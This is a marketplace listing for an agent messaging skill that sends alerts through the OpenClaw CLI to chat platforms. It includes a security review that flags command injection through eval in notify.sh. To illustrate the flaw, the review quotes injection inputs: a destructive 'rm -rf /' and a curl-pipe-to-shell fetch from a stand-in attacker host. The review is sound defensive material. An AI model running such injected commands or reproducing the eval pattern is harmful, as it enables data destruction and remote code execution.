Description

跨渠道消息推送与联络协调。核心职责：打通各类通讯工具与邮件的接口，确保预警和报告能精准推送到目标人员。业务价值：信息直达——让每一条重要消息都能触达对的人、对的设备。激活场景：用户要求发送消息到某个通讯平台（飞书、WhatsApp、Telegram、Discord、Slack、Signal、iMessage、Li...

README (SKILL.md)

跨平台消息联络虾

Name: Cross Platform Messenger Claw
Author: tujinsama

核心能力

通过 OpenClaw CLI openclaw message 命令，向 20+ 通讯渠道发送文本消息和媒体附件。

单条推送

openclaw message send --channel \x3C渠道> --target \x3C目标> --message "\x3C消息>"

带附件：

openclaw message send --channel \x3C渠道> --target \x3C目标> --message "\x3C消息>" --media \x3C路径或URL>

广播/群发

openclaw message broadcast --channel \x3C渠道> --targets \x3C目标1> \x3C目标2> ... --message "\x3C消息>"

或使用 scripts/notify.sh 从文件批量推送：

./scripts/notify.sh --channel \x3C渠道> --message "\x3C消息>" \x3C targets.txt

渠道参考

各渠道的 --channel 值和 --target 格式见 references/channels.md。

最常用渠道速查：

场景	命令
飞书用户	`--channel feishu --target ou_xxx`
飞书群	`--channel feishu --target oc_xxx`
WhatsApp	`--channel whatsapp --target +86138xxxx`
Telegram	`--channel telegram --target @username`
Discord 频道	`--channel discord --target channel:\x3Cid>`
Slack 频道	`--channel slack --target #channel_name`

工作流程

即时推送

确认渠道和目标（who + where）
确认消息内容和格式（文本/附件/卡片）
用 openclaw message send 执行
反馈发送结果

定时推送（cron + notify.sh）

确认推送频率、时间、内容模板
编写推送脚本或使用 scripts/notify.sh
通过 openclaw cron 设置定时任务
验证首次执行结果

条件推送（预警场景）

确认触发条件（阈值、事件等）
确认推送目标和消息模板
编写检测脚本（可用 scripts/notify.sh 发送结果）
通过 cron 或 heartbeat 实现定期检查

消息格式建议

飞书/Discord/Slack：支持 Markdown，善用格式化
WhatsApp：纯文本为主，避免 Markdown 特殊字符
Telegram：支持部分 Markdown，可用按钮交互
跨渠道通用：优先使用纯文本 + Emoji，确保兼容性
重要通知：建议多渠道冗余推送

注意事项

各渠道有频率限制，群发时注意间隔
媒体文件建议 \x3C 30MB
--dry-run 可用于测试而不实际发送
发送失败时检查目标格式和渠道配置

Usage Guidance

这是一个与描述相符的“跨渠道推送”脚本包，但有实质性安全注意事项： - 主要风险：scripts/notify.sh 使用 eval 在 shell 中执行由参数拼接出的命令字符串，会导致命令注入。如果消息内容或目标来自不受信任的输入（例如用户输入的文本或外部文件），攻击者可注入并执行任意命令。示例危险输入："; rm -rf / # 或 $(curl http://attacker/x|sh)"。 - 建议在安装/运行前采取以下措施： 1) 不要在自动化环境中直接传入未消毒的外部数据到 --message/targets。先用白名单或转义限制目标格式（例如严格验证电话号码/ID 格式）。 2) 将脚本修复为不使用 eval：在构建命令时保持为 bash 数组并以 "${cmd[@]}" 执行，或直接调用 openclaw 命令而不是构造并 eval 字符串。举例： - 避免: cmd=$(build_cmd "$target") && eval "$cmd" - 更好: 在 send_one 中直接构造数组 cmd=(openclaw message send --channel ... ) 然后执行 "${cmd[@]}"。 3) 使用 --dry-run 先验证要发送的参数输出；在批量/cron 场景下先在安全环境中测试。 4) 明确凭据来源：确认 OpenClaw CLI 已正确且安全地配置各渠道的 API keys/tokens，且这些凭据存放位置和访问权限符合最小权限原则。 - 如果你是维护者：在 README/SKILL.md 中补充对凭据配置的说明，修复脚本以消除 eval，并添加输入验证与日志/失败处理。基于以上不安全的执行方式和文档不完整性，我建议在修复脚本（去掉 eval、增加输入验证）并补充凭据配置说明前，将该技能视为有风险并谨慎部署。

Capability Analysis

Type: OpenClaw Skill Name: cross-platform-messenger-claw Version: 1.0.0 The skill provides legitimate cross-platform messaging functionality but contains a shell injection vulnerability in 'scripts/notify.sh'. The script uses 'eval' to execute a command string constructed from unsanitized inputs ($CHANNEL, $TARGET, $MESSAGE, $MEDIA), which could allow an attacker to execute arbitrary shell commands if they can influence the message content or target list. While no clear evidence of malicious intent was found, the use of 'eval' on external input is a high-risk coding practice.

Capability Assessment

ℹ Purpose & Capability

Skill 名称与描述（跨渠道消息推送）与 SKILL.md 和 scripts/notify.sh 的功能一致：都用 openclaw CLI 发送消息到多个渠道。没有声明额外的环境变量或凭据，可能是因为依赖于本地已配置的 OpenClaw CLI 凭据；这种依赖是合理但未明确说明，应当在文档里说明如何配置渠道 API token/credentials（飞书/WhatsApp/Slack 等）和 openclaw CLI 的先决条件。

⚠ Instruction Scope

SKILL.md 与脚本的运行边界主要局限于调用本地 openclaw CLI 并从 stdin 或参数读取目标与消息，但脚本在 send_one 中通过 eval 执行构造的命令字符串（eval "$cmd"）。这会导致命令注入风险：如果 message 或 target 包含恶意字符（如分号、反引号、$()、`），攻击者或不受信任的输入可执行任意 shell 命令。此外脚本未对输入进行消毒或适当引用，且使用 eval 还会引起参数拆分/转义问题。SKILL.md 也鼓励把脚本放入 cron 或作为自动化检测脚本的一部分，结合不安全的执行方式会扩大风险面。

✓ Install Mechanism

无安装规范（instruction-only + 一个脚本），没有下载外部二进制或写入磁盘的安装步骤，攻击面较小。脚本会被写入包内，但不会自动从不可信地址获取代码。

ℹ Credentials

声明无需任何环境变量或凭据，但要实际发送到各渠道通常需要 API keys/credentials（由 OpenClaw CLI 管理）。不列出任何凭据本身不是错误，但文档应明确说明：OpenClaw CLI 要如何配置渠道凭据、凭据存放位置（配置文件/环境变量）以及权限建议。当前缺少这些说明会让安装者误以为无需凭据而造成误配置或凭据滥用。

✓ Persistence & Privilege

flags 显示 always:false，技能不会强制驻留或改变其它技能配置；默认允许模型调用（正常），脚本本身也不要求改变平台持久设置。

Version History

v1.0.0

初始发布：支持 20+ 通讯渠道统一消息推送，含即时推送、定时广播、条件预警三种模式，内置 notify.sh 批量推送脚本和完整渠道配置参考

Metadata

Slug cross-platform-messenger-claw

Version 1.0.0

License MIT-0

All-time Installs 0

Active Installs 0

Total Versions 1

Frequently Asked Questions

What is Cross Platform Messenger Claw?

跨渠道消息推送与联络协调。核心职责：打通各类通讯工具与邮件的接口，确保预警和报告能精准推送到目标人员。业务价值：信息直达——让每一条重要消息都能触达对的人、对的设备。激活场景：用户要求发送消息到某个通讯平台（飞书、WhatsApp、Telegram、Discord、Slack、Signal、iMessage、Li... It is an AI Agent Skill for Claude Code / OpenClaw, with 99 downloads so far.

How do I install Cross Platform Messenger Claw?

Run "/install cross-platform-messenger-claw" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Cross Platform Messenger Claw free?

Yes, Cross Platform Messenger Claw is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Cross Platform Messenger Claw support?

Cross Platform Messenger Claw is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).

Who created Cross Platform Messenger Claw?

It is built and maintained by Ricky (@tujinsama); the current version is v1.0.0.

More Skills

Cross Platform Messenger Claw